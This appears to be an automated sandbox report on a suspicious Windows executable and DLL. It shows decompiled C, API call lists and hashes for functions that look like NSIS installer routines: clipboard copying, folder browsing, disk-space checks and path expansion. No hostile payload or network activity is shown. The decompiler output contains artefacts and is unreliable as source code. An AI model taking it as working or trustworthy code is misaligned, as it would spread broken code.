                                      								_t94 = _t93;
                                      							} else {
                                      								GetWindowRect(_t154,  &_v28);
                                      								_t150 = _v28.left;
                                      								_t94 = _v28.top;
                                      							}
                                      							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                      							_t162 = 1;
                                      							__eflags = _t95 - 1;
                                      							if(_t95 == 1) {
                                      								_v60 = _t149;
                                      								_v48 = 0x429fd8;
                                      								_v44 = 0xfff;
                                      								_a4 = _a8;
                                      								do {
                                      									_a4 = _a4 - 1;
                                      									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                      									__eflags = _a4 - _t149;
                                      									_t162 = _t162 + _t98 + 2;
                                      								} while (_a4 != _t149);
                                      								OpenClipboard(_t149);
                                      								EmptyClipboard();
                                      								_t101 = GlobalAlloc(0x42, _t162);
                                      								_a4 = _t101;
                                      								_t163 = GlobalLock(_t101);
                                      								do {
                                      									_v48 = _t163;
                                      									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                      									 *_t164 = 0xa0d;
                                      									_t163 = _t164 + 2;
                                      									_t149 = _t149 + 1;
                                      									__eflags = _t149 - _a8;
                                      								} while (_t149 < _a8);
                                      								GlobalUnlock(_a4);
                                      								SetClipboardData(1, _a4);
                                      								CloseClipboard();
                                      							}
                                      							goto L37;
                                      						}
                                      						__eflags =  *0x42e32c - _t149; // 0x0
                                      						if(__eflags == 0) {
                                      							ShowWindow( *0x42eb68, 8);
                                      							__eflags =  *0x42ebec - _t149; // 0x0
                                      							if(__eflags == 0) {
                                      								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                                      							}
                                      							E00403CB6(1);
                                      							goto L25;
                                      						}
                                      						 *0x4293a0 = 2;
                                      						E00403CB6(0x78);
                                      						goto L20;
                                      					} else {
                                      						__eflags = _a12 - 0x403;
                                      						if(_a12 != 0x403) {
                                      							L20:
                                      							return E00403D44(_a8, _a12, _a16);
                                      						}
                                      						ShowWindow( *0x42e330, _t149);
                                      						ShowWindow(_t154, 8);
                                      						E00403D12(_t154);
                                      						goto L17;
                                      					}
                                      				}
                                      				_v52 = _v52 | 0xffffffff;
                                      				_v40 = _v40 | 0xffffffff;
                                      				_v60 = 2;
                                      				_v56 = 0;
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t123 =  *0x42eb70; // 0x720250
                                      				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                      				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                      				 *0x42e330 = GetDlgItem(_a4, 0x403);
                                      				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                                      				_t127 = GetDlgItem(_a4, 0x3f8);
                                      				 *0x42e344 = _t127;
                                      				_v8 = _t127;
                                      				E00403D12( *0x42e330);
                                      				 *0x42e334 = E0040456B(4);
                                      				 *0x42e34c = 0;
                                      				GetClientRect(_v8,  &_v28);
                                      				_v52 = _v28.right - GetSystemMetrics(0x15);
                                      				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                      				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                      				if(_a8 >= 0) {
                                      					SendMessageA(_v8, 0x1001, 0, _a8);
                                      					SendMessageA(_v8, 0x1026, 0, _a8);
                                      				}
                                      				if(_a12 >= _t149) {
                                      					SendMessageA(_v8, 0x1024, _t149, _a12);
                                      				}
                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                      				_push(0x1b);
                                      				E00403CDD(_a4);
                                      				if(( *0x42eb78 & 0x00000003) != 0) {
                                      					ShowWindow( *0x42e330, _t149);
                                      					if(( *0x42eb78 & 0x00000002) != 0) {
                                      						 *0x42e330 = _t149;
                                      					} else {
                                      						ShowWindow(_v8, 8);
                                      					}
                                      					E00403D12( *0x42e328);
                                      				}
                                      				_t158 = GetDlgItem(_a4, 0x3ec);
                                      				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                      				if(( *0x42eb78 & 0x00000004) != 0) {
                                      					SendMessageA(_t158, 0x409, _t149, _a12);
                                      					SendMessageA(_t158, 0x2001, _t149, _a8);
                                      				}
                                      				goto L37;
                                      			}

                                      0x00404f87
                                      0x00404f90
                                      0x00404fa0
                                      0x00404fac
                                      0x00404fac
                                      0x00000000

                                      APIs
                                      • GetDlgItem.USER32 ref: 00404E66
                                      • GetDlgItem.USER32 ref: 00404E75
                                      • GetClientRect.USER32 ref: 00404EB2
                                      • GetSystemMetrics.USER32 ref: 00404EBA
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                      • ShowWindow.USER32(?,00000008), ref: 00404F56
                                      • GetDlgItem.USER32 ref: 00404F77
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                                      • GetDlgItem.USER32 ref: 00404E84
                                        • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                                      • GetDlgItem.USER32 ref: 00404FC9
                                      • CreateThread.KERNEL32 ref: 00404FD7
                                      • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                      • ShowWindow.USER32(00000000), ref: 00405002
                                      • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                      • ShowWindow.USER32(00000008), ref: 0040504E
                                      • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                                      • CreatePopupMenu.USER32 ref: 00405091
                                      • AppendMenuA.USER32 ref: 004050A6
                                      • GetWindowRect.USER32 ref: 004050B9
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                                      • OpenClipboard.USER32(00000000), ref: 00405128
                                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                      • GlobalLock.KERNEL32 ref: 00405141
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                      • SetClipboardData.USER32 ref: 00405178
                                      • CloseClipboard.USER32 ref: 0040517E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {
                                      • API String ID: 590372296-366298937
                                      • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                      • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                      • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                      • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                      				signed int _v8;
                                      				struct HWND__* _v12;
                                      				long _v16;
                                      				long _v20;
                                      				char _v24;
                                      				long _v28;
                                      				char _v32;
                                      				intOrPtr _v36;
                                      				long _v40;
                                      				signed int _v44;
                                      				CHAR* _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				CHAR* _v68;
                                      				void _v72;
                                      				char _v76;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				intOrPtr _t81;
                                      				long _t86;
                                      				signed char* _t88;
                                      				void* _t94;
                                      				signed int _t95;
                                      				signed short _t113;
                                      				signed int _t117;
                                      				char* _t122;
                                      				intOrPtr _t124;
                                      				intOrPtr* _t138;
                                      				signed int* _t145;
                                      				intOrPtr _t147;
                                      				signed int _t148;
                                      				signed int _t153;
                                      				struct HWND__* _t159;
                                      				CHAR* _t162;
                                      				int _t163;
                                      
                                      				_t81 =  *0x4297a8;
                                      				_v36 = _t81;
                                      				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                                      				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                      				if(_a8 == 0x40b) {
                                      					E004051D0(0x3fb, _t162);
                                      					E00405B89(_t162);
                                      				}
                                      				if(_a8 != 0x110) {
                                      					L8:
                                      					if(_a8 != 0x111) {
                                      						L20:
                                      						if(_a8 == 0x40f) {
                                      							L22:
                                      							_v8 = _v8 & 0x00000000;
                                      							_v12 = _v12 & 0x00000000;
                                      							E004051D0(0x3fb, _t162);
                                      							if(E004054FF(_t180, _t162) == 0) {
                                      								_v8 = 1;
                                      							}
                                      							E0040592B(0x428fa0, _t162);
                                      							_t145 = 0;
                                      							_t86 = E00405C49(0);
                                      							_v16 = _t86;
                                      							if(_t86 == 0) {
                                      								L31:
                                      								E0040592B(0x428fa0, _t162);
                                      								_t88 = E004054B2(0x428fa0);
                                      								if(_t88 != _t145) {
                                      									 *_t88 =  *_t88 & 0x00000000;
                                      								}
                                      								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                      									_t153 = _a8;
                                      									goto L37;
                                      								} else {
                                      									_t163 = 0x400;
                                      									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                      									_v12 = 1;
                                      									goto L38;
                                      								}
                                      							} else {
                                      								if(0 == 0x428fa0) {
                                      									L30:
                                      									_t145 = 0;
                                      									goto L31;
                                      								} else {
                                      									goto L26;
                                      								}
                                      								while(1) {
                                      									L26:
                                      									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                                      									if(_t113 != 0) {
                                      										break;
                                      									}
                                      									if(_t145 != 0) {
                                      										 *_t145 =  *_t145 & _t113;
                                      									}
                                      									_t145 = E00405465(0x428fa0) - 1;
                                      									 *_t145 = 0x5c;
                                      									if(_t145 != 0x428fa0) {
                                      										continue;
                                      									} else {
                                      										goto L30;
                                      									}
                                      								}
                                      								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                      								_v12 = 1;
                                      								_t145 = 0;
                                      								L37:
                                      								_t163 = 0x400;
                                      								L38:
                                      								_t94 = E0040456B(5);
                                      								if(_v12 != _t145 && _t153 < _t94) {
                                      									_v8 = 2;
                                      								}
                                      								_t147 =  *0x42e33c; // 0x7278ea
                                      								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                      									E004044B6(0x3ff, 0xfffffffb, _t94);
                                      									if(_v12 == _t145) {
                                      										SetDlgItemTextA(_a4, _t163, 0x428f90);
                                      									} else {
                                      										E004044B6(_t163, 0xfffffffc, _t153);
                                      									}
                                      								}
                                      								_t95 = _v8;
                                      								 *0x42ec04 = _t95;
                                      								if(_t95 == _t145) {
                                      									_v8 = E0040140B(7);
                                      								}
                                      								if(( *(_v36 + 0x14) & _t163) != 0) {
                                      									_v8 = _t145;
                                      								}
                                      								E00403CFF(0 | _v8 == _t145);
                                      								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                                      									E004040B0();
                                      								}
                                      								 *0x429fc4 = _t145;
                                      								goto L53;
                                      							}
                                      						}
                                      						_t180 = _a8 - 0x405;
                                      						if(_a8 != 0x405) {
                                      							goto L53;
                                      						}
                                      						goto L22;
                                      					}
                                      					_t117 = _a12 & 0x0000ffff;
                                      					if(_t117 != 0x3fb) {
                                      						L12:
                                      						if(_t117 == 0x3e9) {
                                      							_t148 = 7;
                                      							memset( &_v72, 0, _t148 << 2);
                                      							_v76 = _a4;
                                      							_v68 = 0x429fd8;
                                      							_v56 = E00404450;
                                      							_v52 = _t162;
                                      							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                                      							_t122 =  &_v76;
                                      							_v60 = 0x41;
                                      							__imp__SHBrowseForFolderA(_t122);
                                      							if(_t122 == 0) {
                                      								_a8 = 0x40f;
                                      							} else {
                                      								__imp__CoTaskMemFree(_t122);
                                      								E0040541E(_t162);
                                      								_t124 =  *0x42eb70; // 0x720250
                                      								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                      								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                      									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                                      									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                                      										lstrcatA(_t162, 0x42db00);
                                      									}
                                      								}
                                      								 *0x429fc4 =  &(( *0x429fc4)[0]);
                                      								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                      							}
                                      						}
                                      						goto L20;
                                      					}
                                      					if(_a12 >> 0x10 != 0x300) {
                                      						goto L53;
                                      					}
                                      					_a8 = 0x40f;
                                      					goto L12;
                                      				} else {
                                      					_t159 = _a4;
                                      					_v12 = GetDlgItem(_t159, 0x3fb);
                                      					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                                      						E0040541E(_t162);
                                      					}
                                      					 *0x42e338 = _t159;
                                      					SetWindowTextA(_v12, _t162);
                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                      					_push(1);
                                      					E00403CDD(_t159);
                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                      					_push(0x14);
                                      					E00403CDD(_t159);
                                      					E00403D12(_v12);
                                      					_t138 = E00405C49(7);
                                      					if(_t138 == 0) {
                                      						L53:
                                      						return E00403D44(_a8, _a12, _a16);
                                      					}
                                      					 *_t138(_v12, 1);
                                      					goto L8;
                                      				}
                                      			}


                                      APIs
                                      • GetDlgItem.USER32 ref: 00404167
                                      • SetWindowTextA.USER32(?,?), ref: 00404194
                                      • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                      • lstrcmpiA.KERNEL32(hqliygqis,00429FD8,00000000,?,?), ref: 00404286
                                      • lstrcatA.KERNEL32(?,hqliygqis), ref: 00404292
                                      • SetDlgItemTextA.USER32 ref: 004042A2
                                        • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                        • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                      • SetDlgItemTextA.USER32 ref: 004043EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A$C:\Users\user\AppData\Local\Temp$hqliygqis$xr
                                      • API String ID: 2246997448-1202090729
                                      • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                      • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                      • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                      • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 74%
                                      			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                      				signed int _v8;
                                      				struct _ITEMIDLIST* _v12;
                                      				signed int _v16;
                                      				signed char _v20;
                                      				signed char _v24;
                                      				signed int _v28;
                                      				signed int _t36;
                                      				CHAR* _t37;
                                      				signed char _t39;
                                      				signed int _t40;
                                      				int _t41;
                                      				char _t51;
                                      				char _t52;
                                      				char _t54;
                                      				char _t56;
                                      				void* _t64;
                                      				signed int _t68;
                                      				intOrPtr _t72;
                                      				signed int _t73;
                                      				signed char _t74;
                                      				intOrPtr _t77;
                                      				char _t81;
                                      				void* _t83;
                                      				CHAR* _t84;
                                      				void* _t86;
                                      				signed int _t93;
                                      				signed int _t95;
                                      				void* _t96;
                                      
                                      				_t86 = __esi;
                                      				_t83 = __edi;
                                      				_t64 = __ebx;
                                      				_t36 = _a8;
                                      				if(_t36 < 0) {
                                      					_t77 =  *0x42e33c; // 0x7278ea
                                      					_t36 =  *(_t77 - 4 + _t36 * 4);
                                      				}
                                      				_t72 =  *0x42eb98; // 0x725d88
                                      				_t73 = _t72 + _t36;
                                      				_t37 = 0x42db00;
                                      				_push(_t64);
                                      				_push(_t86);
                                      				_push(_t83);
                                      				_t84 = 0x42db00;
                                      				if(_a4 - 0x42db00 < 0x800) {
                                      					_t84 = _a4;
                                      					_a4 = _a4 & 0x00000000;
                                      				}
                                      				while(1) {
                                      					_t81 =  *_t73;
                                      					if(_t81 == 0) {
                                      						break;
                                      					}
                                      					__eflags = _t84 - _t37 - 0x400;
                                      					if(_t84 - _t37 >= 0x400) {
                                      						break;
                                      					}
                                      					_t73 = _t73 + 1;
                                      					__eflags = _t81 - 0xfc;
                                      					_a8 = _t73;
                                      					if(__eflags <= 0) {
                                      						if(__eflags != 0) {
                                      							 *_t84 = _t81;
                                      							_t84 =  &(_t84[1]);
                                      							__eflags = _t84;
                                      						} else {
                                      							 *_t84 =  *_t73;
                                      							_t84 =  &(_t84[1]);
                                      							_t73 = _t73 + 1;
                                      						}
                                      						continue;
                                      					}
                                      					_t39 =  *(_t73 + 1);
                                      					_t74 =  *_t73;
                                      					_a8 = _a8 + 2;
                                      					_v20 = _t39;
                                      					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                                      					_t68 = _t74;
                                      					_t40 = _t39 | 0x00000080;
                                      					__eflags = _t81 - 0xfe;
                                      					_v28 = _t68;
                                      					_v24 = _t74 | 0x00000080;
                                      					_v16 = _t40;
                                      					if(_t81 != 0xfe) {
                                      						__eflags = _t81 - 0xfd;
                                      						if(_t81 != 0xfd) {
                                      							__eflags = _t81 - 0xff;
                                      							if(_t81 == 0xff) {
                                      								__eflags = (_t40 | 0xffffffff) - _t93;
                                      								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                                      							}
                                      							L41:
                                      							_t41 = lstrlenA(_t84);
                                      							_t73 = _a8;
                                      							_t84 =  &(_t84[_t41]);
                                      							_t37 = 0x42db00;
                                      							continue;
                                      						}
                                      						__eflags = _t93 - 0x1d;
                                      						if(_t93 != 0x1d) {
                                      							__eflags = (_t93 << 0xa) + 0x42f000;
                                      							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                                      						} else {
                                      							E00405889(_t84,  *0x42eb68);
                                      						}
                                      						__eflags = _t93 + 0xffffffeb - 7;
                                      						if(_t93 + 0xffffffeb < 7) {
                                      							L32:
                                      							E00405B89(_t84);
                                      						}
                                      						goto L41;
                                      					}
                                      					_t95 = 2;
                                      					_t51 = GetVersion();
                                      					__eflags = _t51;
                                      					if(_t51 >= 0) {
                                      						L12:
                                      						_v8 = 1;
                                      						L13:
                                      						__eflags =  *0x42ebe4;
                                      						if( *0x42ebe4 != 0) {
                                      							_t95 = 4;
                                      						}
                                      						__eflags = _t68;
                                      						if(_t68 >= 0) {
                                      							__eflags = _t68 - 0x25;
                                      							if(_t68 != 0x25) {
                                      								__eflags = _t68 - 0x24;
                                      								if(_t68 == 0x24) {
                                      									GetWindowsDirectoryA(_t84, 0x400);
                                      									_t95 = 0;
                                      								}
                                      								while(1) {
                                      									__eflags = _t95;
                                      									if(_t95 == 0) {
                                      										goto L29;
                                      									}
                                      									_t52 =  *0x42eb64; // 0x73e81340
                                      									_t95 = _t95 - 1;
                                      									__eflags = _t52;
                                      									if(_t52 == 0) {
                                      										L25:
                                      										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                                      										__eflags = _t54;
                                      										if(_t54 != 0) {
                                      											L27:
                                      											 *_t84 =  *_t84 & 0x00000000;
                                      											__eflags =  *_t84;
                                      											continue;
                                      										}
                                      										__imp__SHGetPathFromIDListA(_v12, _t84);
                                      										__imp__CoTaskMemFree(_v12);
                                      										__eflags = _t54;
                                      										if(_t54 != 0) {
                                      											goto L29;
                                      										}
                                      										goto L27;
                                      									}
                                      									__eflags = _v8;
                                      									if(_v8 == 0) {
                                      										goto L25;
                                      									}
                                      									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                                      									__eflags = _t56;
                                      									if(_t56 == 0) {
                                      										goto L29;
                                      									}
                                      									goto L25;
                                      								}
                                      								goto L29;
                                      							}
                                      							GetSystemDirectoryA(_t84, 0x400);
                                      							goto L29;
                                      						} else {
                                      							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                                      							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                                      							__eflags =  *_t84;
                                      							if( *_t84 != 0) {
                                      								L30:
                                      								__eflags = _v20 - 0x1a;
                                      								if(_v20 == 0x1a) {
                                      									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                      								}
                                      								goto L32;
                                      							}
                                      							E0040594D(_t71, _t84, _t95, _t84, _v20);
                                      							L29:
                                      							__eflags =  *_t84;
                                      							if( *_t84 == 0) {
                                      								goto L32;
                                      							}
                                      							goto L30;
                                      						}
                                      					}
                                      					__eflags = _t51 - 0x5a04;
                                      					if(_t51 == 0x5a04) {
                                      						goto L12;
                                      					}
                                      					__eflags = _v20 - 0x23;
                                      					if(_v20 == 0x23) {
                                      						goto L12;
                                      					}
                                      					__eflags = _v20 - 0x2e;
                                      					if(_v20 == 0x2e) {
                                      						goto L12;
                                      					} else {
                                      						_v8 = _v8 & 0x00000000;
                                      						goto L13;
                                      					}
                                      				}
                                      				 *_t84 =  *_t84 & 0x00000000;
                                      				if(_a4 == 0) {
                                      					return _t37;
                                      				}
                                      				return E0040592B(_a4, _t37);
                                      			}

                                      APIs
                                      • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                                      • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                                      • GetWindowsDirectoryA.KERNEL32(hqliygqis,00000400), ref: 00405A7F
                                      • SHGetSpecialFolderLocation.SHELL32(?,0041A90C), ref: 00405ABB
                                      • SHGetPathFromIDListA.SHELL32(0041A90C,hqliygqis), ref: 00405AC9
                                      • CoTaskMemFree.OLE32(0041A90C), ref: 00405AD4
                                      • lstrcatA.KERNEL32(hqliygqis,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                                      • lstrlenA.KERNEL32(hqliygqis,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hqliygqis$xr
                                      • API String ID: 900638850-1397099916
                                      • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                      • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                                      • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                                      • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 43%
                                      			E10007C40(void* _a4, long* _a8) {
                                      				signed char _v5;
                                      				void* _v12;
                                      				signed int _v16;
                                      				long _v20;
                                      				long _v24;
                                      				long _v28;
                                      				void* _t49;
                                      				void* _t50;
                                      				void* _t83;
                                      
                                      				_v20 = 0;
                                      				_v16 = 0x400;
                                      				 *_a8 = 0;
                                      				if( *_a4 == 2) {
                                      					_v12 = HeapAlloc(GetProcessHeap(), 0, _v16);
                                      					if(_v12 != 0) {
                                      						_v5 =  *((intOrPtr*)(_a4 + 4));
                                      						_v24 = 1;
                                      						while(1) {
                                      							0x10000000(_a4);
                                      							_t83 = _t83 + 4;
                                      							if( *_a4 == 4) {
                                      								break;
                                      							}
                                      							_t49 = _a4;
                                      							if( *_t49 == 2) {
                                      								if(_v24 == 0) {
                                      									_v5 =  *((intOrPtr*)(_a4 + 4));
                                      									L19:
                                      									if(_v24 != 0) {
                                      										_v28 = 0;
                                      									} else {
                                      										_v28 = 1;
                                      									}
                                      									_v24 = _v28;
                                      									continue;
                                      								}
                                      								if(_v20 < _v16) {
                                      									L17:
                                      									0x10000000(_v5 & 0x000000ff);
                                      									_t50 = _a4;
                                      									0x10000000( *(_t50 + 4) & 0x000000ff);
                                      									_t83 = _t83 + 8;
                                      									 *((char*)(_v12 + _v20)) = _t50 + (_t49 << 4);
                                      									_v20 = _v20 + 1;
                                      									goto L19;
                                      								}
                                      								_v16 = _v16 << 1;
                                      								_t49 = HeapReAlloc(GetProcessHeap(), 0, _v12, _v16);
                                      								_v12 = _t49;
                                      								if(_v12 != 0) {
                                      									goto L17;
                                      								}
                                      								return 0;
                                      							}
                                      							if(_v24 != 0) {
                                      								0x10000000("wrong hex string\n");
                                      							}
                                      							 *_a8 = _v12;
                                      							return _v20;
                                      						}
                                      						HeapFree(GetProcessHeap(), 0, _v12);
                                      						return 0;
                                      					}
                                      					return 0;
                                      				}
                                      				0x10000000("Called with incorrect token\n");
                                      				return 0;
                                      			}

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 10007C80
                                      • HeapAlloc.KERNEL32(00000000), ref: 10007C87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
